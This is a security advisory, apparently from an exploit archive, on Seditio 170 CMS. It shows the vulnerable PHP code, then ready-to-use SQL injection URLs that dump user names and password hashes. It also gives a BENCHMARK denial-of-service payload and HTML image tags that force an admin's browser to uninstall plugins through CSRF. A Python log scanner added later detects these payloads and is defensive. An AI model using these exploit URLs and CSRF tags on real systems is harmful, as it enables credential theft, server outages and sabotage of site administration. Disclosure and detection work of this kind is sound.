Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from: http://www.neocrome.net/files/code/seditio-build170.20120302.rar
(MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is prone to an SQL injection vulnerability.
Note: *successful exploitation requires administrative authentication to the system.*
//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');   // 'G' = taken from $_GET; $f is whitelisted by the if() below
$v = sed_import('v','G','TXT');   // $v only passes the TXT filter, which does not escape SQL metacharacters
if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
// $v is concatenated straight into the LIKE pattern; with magic_quotes_gpc off a single quote in v breaks out of the string literal
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");
Exploit:
Extract user/admin/moderator details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--
Overload the MySQL server (the MySQL server goes down under high CPU load; in other words, a denial of service through SQL injection):
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: this can be combined with CSRF, especially when you have no admin access to the system.
For example:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />
Screenshot:
http://s019.radikal.ru/i625/1204/6d/842088135393.png
Seditio 170 (seditio-build170.20120302) is also prone to a CSRF (Cross-Site Request Forgery)
vulnerability because it does not validate requests received via $_GET;
as a result, plugins can be silently uninstalled/stopped/paused/started, which may cause
data loss and loss of functionality.
===========================================================================================
/* Tested against Seditio 165 and seditio-build170.20120302: [Uninstall Plugins] CSRF exploit. */
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
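For the two issues above (the LIKE-clause injection in admin.hits.inc.php and the plugin-uninstall action accepted over plain GET), here is added detection logic run over web-server access logs. It is not part of this advisory or of Seditio; it assumes Apache combined log format and the install host 192.168.0.15 from the test setup, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "192.168.0.15"  # host of the Seditio install in the advisory's test setup

# Constructed Apache combined-log lines (not from the advisory): the request paths
# mirror the PoC URLs above; client IP, timestamps, referers and sizes are made up.
SAMPLE_LOG = r'''
192.168.0.99 - - [12/Apr/2012:04:50:01 +0400] "GET /learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=2012 HTTP/1.1" 200 5120 "http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits" "Mozilla/5.0"
192.168.0.99 - - [12/Apr/2012:04:51:13 +0400] "GET /learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271-- HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
192.168.0.99 - - [12/Apr/2012:04:52:40 +0400] "GET /learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271-- HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.0.99 - - [12/Apr/2012:04:55:02 +0400] "GET /learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall HTTP/1.1" 302 0 "http://evil.example/lure.html" "Mozilla/5.0"
192.168.0.99 - - [12/Apr/2012:04:56:30 +0400] "GET /learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall HTTP/1.1" 302 0 "http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug" "Mozilla/5.0"
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')
# a quote followed by UNION SELECT or BENCHMARK( is the shape of the PoC payloads above
SQLI_RE = re.compile(r"'.*\b(union\s+select|benchmark\s*\()", re.I | re.S)

def analyse(line):
    """Return [(kind, detail)] findings for one combined-log line; [] if clean."""
    m = LOG_RE.match(line)
    if not m or not urlsplit(m["path"]).path.endswith("/admin.php"):
        return []
    q = {k: v[0] for k, v in parse_qs(urlsplit(m["path"]).query).items()}  # %-decoded
    findings = []
    # admin.hits.inc.php concatenates v into a LIKE clause when f is year or month
    if q.get("m") == "hits" and q.get("f") in ("year", "month") and SQLI_RE.search(q.get("v", "")):
        findings.append(("sqli", q["v"]))
    # plugin uninstall is a state change on GET with no token: flag it when the
    # Referer is missing or points at another host (the <img>-tag CSRF shape)
    if q.get("m") == "plug" and q.get("b") == "uninstall":
        if urlsplit(m["referer"]).hostname != SITE_HOST:
            findings.append(("csrf", f"pl={q.get('pl')} referer={m['referer']}"))
    return findings

def scan(log_text):
    """Run analyse() over each non-empty line; returns [(line_no, kind, detail)]."""
    return [(n, kind, detail)
            for n, line in enumerate(log_text.strip().splitlines(), 1)
            for kind, detail in analyse(line)]

if __name__ == "__main__":
    for n, kind, detail in scan(SAMPLE_LOG):
        print(f"line {n}: {kind}: {detail}")
```

A missing Referer is flagged as well, so same-site admins with referrer suppression will show up; the second plugin line, with an on-site Referer, does not.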
==============================================================================================
Information Disclosure:
Post a very long string in an input field.
The application exposes database column names, which is not acceptable from a security standpoint.
For example:
Client-side validation only (maxlength is enforced by the browser, not by the server):
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>
http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data (the profile-update form fields, with an over-long value in ruseroccupation):
Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1
The persistent Cross-Site Scripting vulnerability is still unfixed (from Seditio 161).
The same info/path disclosures are still unfixed (from Seditio 161).
("Thanks" to the TinyMCE editor and to client-side validation) (from Seditio 161)
I notified about it here and to the vendor too, but it is still unfixed in 170.20120302 as well.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^